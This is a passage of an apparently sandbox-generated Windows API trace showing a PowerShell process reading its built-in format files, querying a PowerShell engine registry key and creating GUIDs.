	[0501.582] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xea8398e5, Data2=0x22b5, Data3=0x40ec, Data4=([0]=0x8d, [1]=0xe7, [2]=0x3b, [3]=0xde, [4]=0xb, [5]=0x9, [6]=0x5d, [7]=0xc1))) returned 0x0
	[0501.582] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0501.582] GetFileType (hFile=0x320) returned 0x1
	[0501.582] SetErrorMode (uMode=0x1) returned 0x1
	[0501.582] GetFileType (hFile=0x320) returned 0x1
	[0501.582] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.583] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.583] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.584] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.584] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.584] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.584] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.584] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.585] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.585] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.586] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.586] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.586] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.586] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.587] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.587] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.587] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.588] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.589] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.589] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.589] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.589] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0xe67, lpOverlapped=0x0) returned 1
	[0502.334] ReadFile (in: hFile=0x320, lpBuffer=0x311c7b7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311c7b7*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0502.334] ReadFile (in: hFile=0x320, lpBuffer=0x311d1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x311d1e8*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0502.335] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x320) returned 0x0
	[0502.335] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2ec, lpData=0x0, lpcbData=0x1ad2e8*=0x0 | out: lpType=0x1ad2ec*=0x1, lpData=0x0, lpcbData=0x1ad2e8*=0x56) returned 0x0
	[0502.335] CoTaskMemAlloc (cb=0x5a) returned 0x4541e0
	[0502.335] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2bc, lpData=0x4541e0, lpcbData=0x1ad2b8*=0x56 | out: lpType=0x1ad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2b8*=0x56) returned 0x0
	[0502.335] CoTaskMemFree (pv=0x4541e0) 
	[0502.335] RegCloseKey (hKey=0x320) returned 0x0
	[0502.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0502.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0502.336] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x664b4354, Data2=0x7f36, Data3=0x4c29, Data4=([0]=0x86, [1]=0x2a, [2]=0x65, [3]=0xf1, [4]=0xe6, [5]=0x4b, [6]=0xb3, [7]=0x41))) returned 0x0
	[0502.336] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x476c23cf, Data2=0x5ae4, Data3=0x4a72, Data4=([0]=0xa4, [1]=0x62, [2]=0x66, [3]=0x73, [4]=0x2, [5]=0xc7, [6]=0xbd, [7]=0x8e))) returned 0x0
	[0502.336] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xe038467, Data2=0x97ba, Data3=0x4650, Data4=([0]=0xbc, [1]=0x5d, [2]=0x1a, [3]=0x85, [4]=0xb, [5]=0xf5, [6]=0x9d, [7]=0x8b))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xb1fc1da6, Data2=0x6825, Data3=0x456a, Data4=([0]=0x9c, [1]=0xd3, [2]=0xab, [3]=0xe5, [4]=0x6a, [5]=0xe2, [6]=0x8e, [7]=0x6d))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xbd33ba24, Data2=0xcbe, Data3=0x41a4, Data4=([0]=0xb7, [1]=0x5a, [2]=0x8d, [3]=0xff, [4]=0xcf, [5]=0x6b, [6]=0x7d, [7]=0x5))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xcfe1ddbd, Data2=0xc1b, Data3=0x4afa, Data4=([0]=0x9b, [1]=0x19, [2]=0x1e, [3]=0xa7, [4]=0x17, [5]=0xdd, [6]=0x5a, [7]=0xd4))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x14cc8b0, Data2=0x49, Data3=0x4891, Data4=([0]=0x87, [1]=0x99, [2]=0xcc, [3]=0x30, [4]=0xf2, [5]=0xa0, [6]=0x44, [7]=0x86))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x3c8090ef, Data2=0x4f5f, Data3=0x47f4, Data4=([0]=0xad, [1]=0x8, [2]=0xd9, [3]=0xb4, [4]=0x85, [5]=0x12, [6]=0x72, [7]=0xf0))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x942fa9ab, Data2=0x484b, Data3=0x45d2, Data4=([0]=0x95, [1]=0xdc, [2]=0xd3, [3]=0xba, [4]=0xa, [5]=0x3c, [6]=0x9, [7]=0x13))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x1fc81f6b, Data2=0xa4e9, Data3=0x4778, Data4=([0]=0xad, [1]=0x49, [2]=0xa, [3]=0x13, [4]=0xc7, [5]=0x88, [6]=0xab, [7]=0x43))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x1d2f121b, Data2=0x4d04, Data3=0x4846, Data4=([0]=0x99, [1]=0xc5, [2]=0xe6, [3]=0xb2, [4]=0x23, [5]=0x3f, [6]=0xeb, [7]=0xa9))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x666add7d, Data2=0xaed6, Data3=0x4c75, Data4=([0]=0x86, [1]=0x7c, [2]=0x8b, [3]=0xd3, [4]=0xf6, [5]=0xa5, [6]=0x4d, [7]=0x26))) returned 0x0
	[0502.337] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x58a02630, Data2=0xbe3, Data3=0x4fe6, Data4=([0]=0x97, [1]=0x76, [2]=0x42, [3]=0x8f, [4]=0x9f, [5]=0x44, [6]=0x50, [7]=0x66))) returned 0x0
	[0502.338] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x37823b56, Data2=0xbd9c, Data3=0x4a3c, Data4=([0]=0x94, [1]=0xb4, [2]=0x62, [3]=0xec, [4]=0x32, [5]=0x1d, [6]=0xc8, [7]=0x69))) returned 0x0
	[0502.338] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xae2f0d02, Data2=0xb15a, Data3=0x4042, Data4=([0]=0xa9, [1]=0x24, [2]=0xa2, [3]=0x96, [4]=0xd9, [5]=0x9c, [6]=0x36, [7]=0x4a))) returned 0x0
	[0502.338] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x26a3062b, Data2=0xab35, Data3=0x4195, Data4=([0]=0xbb, [1]=0x4, [2]=0x44, [3]=0xc9, [4]=0x78, [5]=0xf9, [6]=0x41, [7]=0xe8))) returned 0x0
	[0502.338] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x7ea6b235, Data2=0x3767, Data3=0x4726, Data4=([0]=0xb4, [1]=0xcf, [2]=0x9e, [3]=0x36, [4]=0xd6, [5]=0xed, [6]=0xa8, [7]=0xb4))) returned 0x0
	[0502.338] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xf8a589d8, Data2=0x6df5, Data3=0x41c6, Data4=([0]=0x8d, [1]=0xf, [2]=0xa1, [3]=0xdf, [4]=0x67, [5]=0x96, [6]=0x7d, [7]=0xee))) returned 0x0
	[0502.338] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x32fe2c8c, Data2=0xda2d, Data3=0x4b9e, Data4=([0]=0xbd, [1]=0xc1, [2]=0x6a, [3]=0x37, [4]=0xc9, [5]=0xb9, [6]=0x71, [7]=0xe6))) returned 0x0
	[0502.338] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x39a3c8c4, Data2=0x52fc, Data3=0x4f79, Data4=([0]=0xb6, [1]=0xc5, [2]=0x50, [3]=0x7c, [4]=0x21, [5]=0xe2, [6]=0xfb, [7]=0x4f))) returned 0x0
	[0502.338] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x2b2a3bec, Data2=0x9301, Data3=0x4bbb, Data4=([0]=0x80, [1]=0xec, [2]=0xa3, [3]=0x21, [4]=0x6, [5]=0xff, [6]=0xcc, [7]=0xd5))) returned 0x0
	[0502.339] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x8680513b, Data2=0x7711, Data3=0x4dbb, Data4=([0]=0xa2, [1]=0xdf, [2]=0xf3, [3]=0xff, [4]=0xf6, [5]=0x18, [6]=0xdc, [7]=0x8d))) returned 0x0
	[0502.339] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xfb062bce, Data2=0x2309, Data3=0x4e43, Data4=([0]=0x92, [1]=0xe3, [2]=0x10, [3]=0xb8, [4]=0x41, [5]=0xc7, [6]=0x6f, [7]=0xd3))) returned 0x0
	[0502.339] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x90a290dc, Data2=0x12c1, Data3=0x4c92, Data4=([0]=0x94, [1]=0x8a, [2]=0xee, [3]=0x4c, [4]=0xf6, [5]=0x4e, [6]=0x12, [7]=0xd))) returned 0x0
	[0502.339] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xd23287ef, Data2=0xc60, Data3=0x4e67, Data4=([0]=0xb1, [1]=0x35, [2]=0x34, [3]=0xd7, [4]=0xd8, [5]=0x5f, [6]=0x64, [7]=0xb8))) returned 0x0
	[0502.339] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xcc1fa2cc, Data2=0xbf75, Data3=0x4d69, Data4=([0]=0xa7, [1]=0x24, [2]=0xa2, [3]=0xf8, [4]=0x85, [5]=0x95, [6]=0x84, [7]=0x6c))) returned 0x0
	[0502.339] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x291962f1, Data2=0x1ed5, Data3=0x4f09, Data4=([0]=0x9c, [1]=0x93, [2]=0x46, [3]=0xe, [4]=0x80, [5]=0xe3, [6]=0x68, [7]=0xec))) returned 0x0
	[0502.339] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x4d14b89a, Data2=0xb396, Data3=0x4cb1, Data4=([0]=0xa5, [1]=0x38, [2]=0xde, [3]=0xb2, [4]=0x89, [5]=0xa6, [6]=0x0, [7]=0xb))) returned 0x0
	[0502.339] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x4c3aa821, Data2=0x8f0d, Data3=0x40cf, Data4=([0]=0x8d, [1]=0xa2, [2]=0x5f, [3]=0x99, [4]=0xe2, [5]=0x7d, [6]=0x27, [7]=0x24))) returned 0x0
	[0502.339] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xc9e9af19, Data2=0xad19, Data3=0x4af2, Data4=([0]=0xbd, [1]=0xf0, [2]=0xd, [3]=0xd, [4]=0x74, [5]=0xbe, [6]=0x26, [7]=0xe1))) returned 0x0
	[0502.340] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x9d728258, Data2=0xe36, Data3=0x42ee, Data4=([0]=0xa4, [1]=0xcd, [2]=0x79, [3]=0xe6, [4]=0x44, [5]=0xd0, [6]=0x7, [7]=0xb))) returned 0x0
	[0502.340] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xf3996597, Data2=0x1200, Data3=0x491e, Data4=([0]=0xa8, [1]=0x6, [2]=0xf4, [3]=0xe8, [4]=0x35, [5]=0x2c, [6]=0x58, [7]=0x6b))) returned 0x0
	[0502.340] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xdb12e1f2, Data2=0x35de, Data3=0x4537, Data4=([0]=0x97, [1]=0xa1, [2]=0xf2, [3]=0x3c, [4]=0xcd, [5]=0xe6, [6]=0xb7, [7]=0x44))) returned 0x0
	[0502.341] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xc175625e, Data2=0x9770, Data3=0x4e17, Data4=([0]=0x9d, [1]=0x70, [2]=0x9b, [3]=0xd1, [4]=0x89, [5]=0x65, [6]=0xa0, [7]=0x22))) returned 0x0
	[0502.341] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xc2416a76, Data2=0xcf13, Data3=0x4770, Data4=([0]=0xa7, [1]=0x61, [2]=0xdf, [3]=0x3f, [4]=0x1c, [5]=0xfb, [6]=0x51, [7]=0x5e))) returned 0x0
	[0502.341] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xf88bec5a, Data2=0x5cc3, Data3=0x4f82, Data4=([0]=0x9b, [1]=0xff, [2]=0x8b, [3]=0xd8, [4]=0x66, [5]=0x70, [6]=0x60, [7]=0xf8))) returned 0x0
	[0502.341] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x3f8be7f7, Data2=0xb03, Data3=0x4e86, Data4=([0]=0x8c, [1]=0x85, [2]=0x65, [3]=0x42, [4]=0x73, [5]=0xca, [6]=0xbe, [7]=0x2d))) returned 0x0
	[0502.341] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x76a11df3, Data2=0xaacb, Data3=0x40ff, Data4=([0]=0x8c, [1]=0xf8, [2]=0x87, [3]=0x1f, [4]=0x2a, [5]=0x80, [6]=0xa8, [7]=0x56))) returned 0x0
	[0502.341] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x91c40303, Data2=0xbe12, Data3=0x4921, Data4=([0]=0xb0, [1]=0xa9, [2]=0x21, [3]=0x2c, [4]=0x1a, [5]=0x4c, [6]=0x4c, [7]=0x8b))) returned 0x0
	[0502.341] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x163f2eec, Data2=0x1017, Data3=0x4243, Data4=([0]=0xb7, [1]=0x13, [2]=0xce, [3]=0xfb, [4]=0xcb, [5]=0x33, [6]=0xd1, [7]=0x4))) returned 0x0
	[0502.341] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x82ab3e4c, Data2=0x196d, Data3=0x404b, Data4=([0]=0x88, [1]=0x21, [2]=0xd2, [3]=0x5, [4]=0xd4, [5]=0x83, [6]=0x12, [7]=0xd9))) returned 0x0
	[0502.342] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x78779e39, Data2=0xdb0b, Data3=0x41d1, Data4=([0]=0xb5, [1]=0x8e, [2]=0xc0, [3]=0x7d, [4]=0xf3, [5]=0x66, [6]=0x89, [7]=0x2))) returned 0x0
	[0502.342] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xb6213b14, Data2=0x4fa1, Data3=0x4448, Data4=([0]=0x82, [1]=0x67, [2]=0x20, [3]=0x3d, [4]=0xe9, [5]=0x4a, [6]=0xe0, [7]=0x1a))) returned 0x0
	[0502.342] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xcda2ad75, Data2=0xe1ee, Data3=0x449b, Data4=([0]=0x94, [1]=0x5, [2]=0x5, [3]=0xfd, [4]=0x5e, [5]=0x7c, [6]=0x94, [7]=0x60))) returned 0x0
	[0502.342] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x90f2093e, Data2=0xe571, Data3=0x428d, Data4=([0]=0xaf, [1]=0xe2, [2]=0x6b, [3]=0x68, [4]=0x87, [5]=0xa6, [6]=0x26, [7]=0x9b))) returned 0x0
	[0502.342] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xa1c96f96, Data2=0x78a, Data3=0x477f, Data4=([0]=0x95, [1]=0x5f, [2]=0x41, [3]=0xf6, [4]=0x67, [5]=0x9a, [6]=0xc5, [7]=0xaa))) returned 0x0
	[0502.342] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x9d671941, Data2=0xf7c2, Data3=0x4c24, Data4=([0]=0x97, [1]=0x2c, [2]=0x89, [3]=0x84, [4]=0xfe, [5]=0x5, [6]=0x76, [7]=0x9))) returned 0x0
	[0502.342] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x50ef2f47, Data2=0xe660, Data3=0x455b, Data4=([0]=0xa4, [1]=0x39, [2]=0x81, [3]=0x38, [4]=0x27, [5]=0x77, [6]=0xdd, [7]=0x8))) returned 0x0
	[0502.342] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0502.343] GetFileType (hFile=0x320) returned 0x1
	[0502.343] SetErrorMode (uMode=0x1) returned 0x1
	[0502.343] GetFileType (hFile=0x320) returned 0x1
	[0502.343] ReadFile (in: hFile=0x320, lpBuffer=0x327b320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x327b320*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0502.343] ReadFile (in: hFile=0x320, lpBuffer=0x327b320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x327b320*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0502.344] ReadFile (in: hFile=0x320, lpBuffer=0x327b320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x327b320*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0502.344] ReadFile (in: hFile=0x320, lpBuffer=0x327b320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x327b320*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0502.344] ReadFile (in: hFile=0x320, lpBuffer=0x327b320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x327b320*, lpNumberOfBytesRead=0x1ad2d8*=0x8b4, lpOverlapped=0x0) returned 1
	[0502.344] ReadFile (in: hFile=0x320, lpBuffer=0x327a73c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x327a73c*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0502.344] ReadFile (in: hFile=0x320, lpBuffer=0x327b320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x327b320*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0502.344] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x320) returned 0x0
	[0502.344] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2ec, lpData=0x0, lpcbData=0x1ad2e8*=0x0 | out: lpType=0x1ad2ec*=0x1, lpData=0x0, lpcbData=0x1ad2e8*=0x56) returned 0x0
	[0502.344] CoTaskMemAlloc (cb=0x5a) returned 0x4541e0
	[0502.344] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2bc, lpData=0x4541e0, lpcbData=0x1ad2b8*=0x56 | out: lpType=0x1ad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2b8*=0x56) returned 0x0
	[0502.344] CoTaskMemFree (pv=0x4541e0) 
	[0502.344] RegCloseKey (hKey=0x320) returned 0x0
	[0502.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0502.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0502.345] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x1ab599f8, Data2=0x281f, Data3=0x4022, Data4=([0]=0xbe, [1]=0x1d, [2]=0xe, [3]=0x2c, [4]=0x6b, [5]=0x43, [6]=0x39, [7]=0x5e))) returned 0x0
